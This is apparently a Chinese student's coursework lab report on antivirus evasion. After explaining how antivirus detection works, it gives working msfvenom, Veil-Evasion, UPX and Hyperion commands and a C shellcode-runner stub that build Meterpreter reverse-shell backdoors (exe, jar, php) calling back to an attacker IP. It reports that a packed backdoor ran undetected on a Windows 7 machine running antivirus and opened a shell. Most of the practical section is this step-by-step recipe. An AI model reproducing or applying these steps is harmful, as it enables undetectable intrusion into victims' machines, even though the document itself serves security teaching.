- Exp3-免杀原理与实践
- 1 基础问题回答
- 2 实验环境
- 3 实践内容
- 3.1 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
- 3.1.1 检测实验2中生成的后门程序
- 3.1.2 编码一次
- 3.1.2 编码10次
- 3.2 生成jar文件
- 3.3 生成php文件
- 3.4 veil,加壳工具
- 3.4.1 veil
- 3.4.1.1 下载(其实先下载wine32会快点)
- 3.4.1.2 使用
- 3.4.2 加壳
- 3.4.1 veil
- 3.5 使用C + shellcode编程
- 3.5.1 生成c文件,得到机器码
- 3.5.2 补充代码shell_c.c(注意缩进,vim里调整更方便)
- 3.5.3 跨平台交叉编译
- 3.6 通过组合应用各种技术实现恶意代码免杀
- 3.6.1 c+shellcode+Hyperion
- 3.6.1.1 下载Hyperion2.2
- 3.6.1.2修改makefile,make
- 3.6.1.3 加壳
- 3.6.1 c+shellcode+Hyperion
- 3.6.2 python+aes_encrypt
- 3.6.2.1 打开veil,选择Evasion
- 3.6.2.2 使用aes_encrypt_py生成后门
- 3.7 附加题:用另一电脑实测,在杀软开启的情况下,可运行并回连成功
- 3.1 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件
- 实验体会与总结
- 1.1 杀软是如何检测出恶意代码的?
1.基于特征码的检测
1.在扫描程序工作后根据特征文件中的特征字符串,进行与待检测文件的扫描匹配,是检测已知恶意代码的最主要方法。
2.启发式恶意软件检测
根据片面特征去推断(看起来像),通常缺乏精确判断依据不需要及时更新,具有通用型;但实时监控系统行为开销稍大,没有基于特征码的精确度高。
3.基于行为的恶意软件检测
基于行为的检测相当于启发式的一种,或者是加入了行为监控的启发式让软件运行,记录其行为并分析(杀软的工作原理)。
4.完整性检测
通过hash值来判断文件是否被篡改。
5.云查杀技术
采用引擎加云上特征库的方式,用最小的资源来对病毒进行查杀。
6.基于人工智能的检测技术
利用数据挖掘等人工智能算法,区分恶意代码与正常代码的行为特征,并形成特征知识库,新的未知代码经过系统评判和学习后,通过分类器的进一步操作将其划入某一个分类。
- 1.2 免杀是做什么?
免杀就是让安插在被控机器的恶意代码不被杀毒软件软件发现
- 1.3 免杀的基本方法有哪些?
1.加冷门壳
2.加花指令
3.改程序入口点
4.修改内存特征码
5.直接修改特征码的十六进制法::把特征码所对应的十六进制改成数字差1或差不多的十六进制.
6.修改字符串大小写法:把特征码所对应的内容是字符串的,只要把大小字互换一下就可以了.
7.等价替换法:把特征码所对应的汇编指令命令中替换成功能类拟的指令.
8.指令顺序调换法:把具有特征码的代码顺序互换一下.
9.通用跳转法:把特征码移到零区域(指代码的空隙处),然后一个JMP又跳回来执行.
- 1.4 开启杀软能绝对防止电脑中恶意代码吗?
2 实验环境不是绝对的,杀毒软件也是通过特征码或者可疑行为分析出恶意代码,恶意代码注意这两点,应该也杀不出来。
免杀测试平台:https://www.virustotal.com/
3 实践内容 3.1 正确使用msf编码器,使用msfvenom生成如jar之类的其他文件 3.1.1 检测实验2中生成的后门程序
msfvenom -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed -b ‘\x00’ LHOST=172.30.7.176 LPORT=1227 -f exe > shell1.exe
3.1.2 编码10次发现一个奇妙的事情,不编码杀软还杀不出来,一编码大多数杀软就杀出来了,这里我有一个猜测,杀软检测的特征码是unicode_mixed编码器。还有一种可能,就是编码后恰好将原有的码编译成了可被杀软检测的特征码。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/unicode_mixed -i -10 -b ‘\x00’ LHOST=172.30.7.176 LPORT=1227 -f exe > shell10.exe
这里就验证了我们3.1.1的猜想,本身的反弹连接杀软是杀不出来的,在他编码后却可以被杀出来,所以,杀软检测的特征码是unicode_mixed编码器的机器码。
- -e选择编码器,-b是payload中需要去除的字符,该命令中为了使'\x00'不出现在shellcode中,因为shellcode以'\x00'为结束符,-i设置迭代次数
JAR文件是一种归档文件,以ZIP格式构建,以.jar为文件扩展名。
msfvenom -p java/shell_reverse_tcp LHOST=172.30.7.176 LPORT=1227 -f jar > shell.jar
生成压缩包文件后检测率明显降低了,且有一些杀软都无法检测。
3.3 生成php文件后续如果要自己写免杀,且我要使用jar格式的话,直接找上图中的杀毒软件哈哈哈哈哈哈哈
msfvenom -p php/meterpreter/reverse_tcp LHOST=172.30.7.176 LPORT=1227 x> shell.php
3.4 veil,加壳工具 3.4.1 veil 3.4.1.1 下载(其实先下载wine32会快点)检测率明显降低了很多
sudo apt-get install veil-evasion
下载成功后
cd /usr/share/veil/config
vim setup.sh
将250行左右的内容修改为 sudo git clone https://gitee.com/spears/VeilDependencies.git
修改成功后
veil
等待安装
veil
use evasion 或者 use 1
use c/meterpreter/rev_tcp.py
set LHOST 172.30.7.176
set LPORT 1227
generate
输入文件名的时候信息量尽量全面,免得文件多了会混淆
3.4.2 加壳输入list可以查看各种模式
upx shell10.exe -o shell10_upx.exe
3.5 使用C + shellcode编程 3.5.1 生成c文件,得到机器码加密过的代码信息熵太高,也会被查出来(信息密度太大),不过相比不加壳来说还是有点效果。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.7.176 LPORT=1227 -f c
int main()
{
int (*func)() = (int(*)())buf;
func();
}
i686-w64-mingw32-g++ shell_c.c -o shell_c.exe
3.6 通过组合应用各种技术实现恶意代码免杀 3.6.1 c+shellcode+Hyperion 3.6.1.1 下载Hyperion2.2按照常理来说,c编译应该是会跟直接生成exe一样杀不出来才对,而这里却杀出来了,但是比编码要强一点,我在想会不会是因为编译平台的原因,虽然是跨平台交叉编译,但是在Linux端编译被记录下来了,就像这个例子:一个exe文件却在Linux平台编译,有点可疑。
wget https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/Hyperion-2.2.zip
(如果拒绝连接:1、sudo vim /etc/hosts
2、添加一个条目 199.232.28.133 raw.githubusercontent.com)
下载Hyperion2.2
unzip Hyperion-2.2.zip
vim Makefile
编译方法改成交叉编译i686-w64-mingw32-gcc
make
wine hyperion.exe -v shell_c.exe shell_c_hyperion.exe
注意要在一个文件夹内,最好是在Hyperion2.2文件夹内,要不然找不到运行的程序位置
veil
use 1
list##寻找palyload
use python/shellcode_inject/aes_encrypt.py
generate
选择2
3.7 附加题:用另一电脑实测,在杀软开启的情况下,可运行并回连成功这里的原理便是使用了数据加密的方式进行多次编译后门软件
主机上做不了,于是转到虚拟机中,使用win7+360安全卫士和360杀毒,使用的后门程序是20191310_veil_upx.exe。此处的程序是第二项中生成的,在经过加密和加壳之后,普通杀软(火绒、360)已经无法杀出
kali端:
成功getshell并进行了一系列操作
实验体会与总结在第一个此实验第一题编码中,发现一个奇妙的事情:不编码杀软还杀不出来,一编码大多数杀软就杀出来了,这里我有一个猜测,杀软检测的特征码是unicode_mixed编码器。还有一种可能,就是编码后恰好将原有的码编译成了可被杀软检测的特征码。编码十次后发现检测率惊人相似,只减少了一个。这就验证了我们的猜想了,就是杀的unicode_mixed的特征码。